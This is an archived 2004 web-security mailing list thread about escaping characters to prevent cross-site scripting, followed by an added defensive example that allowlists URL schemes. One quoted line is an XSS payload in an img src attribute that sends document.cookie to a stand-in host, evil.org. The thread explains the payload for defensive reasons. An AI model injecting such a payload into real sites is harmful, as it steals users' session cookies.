WebApp Sec mailing list archives
Re: AppSec FAQ at OWASP
From: オマル イスマイル <isumai-u () is aist-nara ac jp>
Date: Thu, 29 Jan 2004 22:55:25 +0900
On 2004.1.29, at 06:40 PM, Sangita Pakala wrote:
Thank you Ulf for the nice words. To address your question:

Why is it important to escape "(", ")" and "#"?

We need to escape these characters to take care of CSS that do not rely on <script> tags. For instance, the "javascript:" construct could be used to embed scripts without using the <script> tag. In the example below, let's say that the user's input is reflected as the value for <img src= >. Now, when the img src= line is encountered, the window.open javascript function is called and the cookie sent to evil.org

<img src="Javascript:window.open('http:// www.evil.org?cookie='+document.cookie)">

Escaping the "(" and ")" above renders the function call mute.

If someone can point me to a good example for when escaping "#" is reqd, I'd love to hear that. Gunter Ollmann has an excellent article on CSS and special characters at http://www.technicalinfo.net/papers/CSS.html

Regards,
Sangita.

Sangita Pakala
Paladion Networks
http://www.paladion.net
Sangita, I would like to know how you deal with the false positive? In the case of <img src= "javascript: preview(....)> or <img src="javascript:window.close()>..etc..etc.. If you escape the "(" and ")", that means you render out the harmless Javascript too.
Thanks

~~~~~~~~~~~~~~~~00101001~~~~~~~~~~~~~~
Omarjan Ismail
Internet Engineering Lab,
Graduate School of Information Science
Nara Institute of Science and Technology
Nara, Japan, 630-0101
Isumai-u () is aist-nara ac jp
~~~~~~~~~~~~~~~00101001~~~~~~~~~~~~~~~~
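An added example, not part of the original thread or of the OWASP FAQ: one way to handle user input reflected into `<img src>` that sidesteps the false-positive question above is to decide on the URL scheme and then encode for the attribute context, instead of rewriting "(" and ")". The function names and the http/https allowlist are assumptions, and the sample URLs in the comments are constructed.

```javascript
// Added example. All names are hypothetical; the allowlist is an assumption.
const ALLOWED_SCHEMES = new Set(["http", "https"]);

// Encode characters that could break out of a double-quoted attribute value.
function encodeAttr(value) {
  return value.replace(/[&<>"']/g, (c) => `&#${c.charCodeAt(0)};`);
}

// Return the lower-cased scheme roughly as a browser's URL parser sees it,
// or null when the value has no scheme (relative URL or malformed input).
function schemeOf(url) {
  const cleaned = url
    .replace(/^[\u0000-\u0020]+/, "") // leading control chars and spaces are stripped
    .replace(/[\t\n\r]/g, "");        // tab / newline inside a URL are ignored
  const m = /^([a-zA-Z][a-zA-Z0-9+.\-]*):/.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

// Build the tag only for allowlisted absolute URLs; otherwise return null so
// the caller can omit the image or substitute a placeholder.
function renderImg(userUrl) {
  const scheme = schemeOf(userUrl);
  if (scheme === null || !ALLOWED_SCHEMES.has(scheme)) {
    return null;
  }
  return `<img src="${encodeAttr(userUrl)}">`;
}

// Constructed sample: parentheses in an ordinary image URL survive untouched,
//   renderImg("http://example.org/photo_(1).png")
// while every "javascript:" value, harmless or not, is refused the same way,
//   renderImg("javascript:window.close()")
```

Because the decision is made on the scheme, no `javascript:` value reaches the page at all, so there is nothing to classify as harmless or harmful, and legitimate URLs that happen to contain parentheses are not altered.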